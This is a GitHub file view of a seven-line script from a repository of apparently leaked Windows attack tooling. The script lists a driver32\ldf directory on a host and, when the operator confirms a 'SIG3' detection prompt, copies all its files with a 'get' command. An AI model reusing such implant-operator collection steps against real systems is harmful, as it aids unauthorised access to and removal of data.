shadowbrokers-exploits/windows/Resources/Ep/Scripts/malfind/getsig3.eps

7 lines
336 B
PostScript
Raw Permalink Normal View History

string $ldf_dir = GetEnv("SYSPATH");
$ldf_dir = "$ldf_dir\\driver32\\ldf";
`dir * -path "$ldf_dir" -max 0`;
if (prompt "SIG3 was detected. Do you want to download the SIG3-related files? (Look at the dir output for the \"$ldf_dir\" directory in EP log viewer to see what you'd be getting)") {
`get * -path "$ldf_dir" -max 0`;
}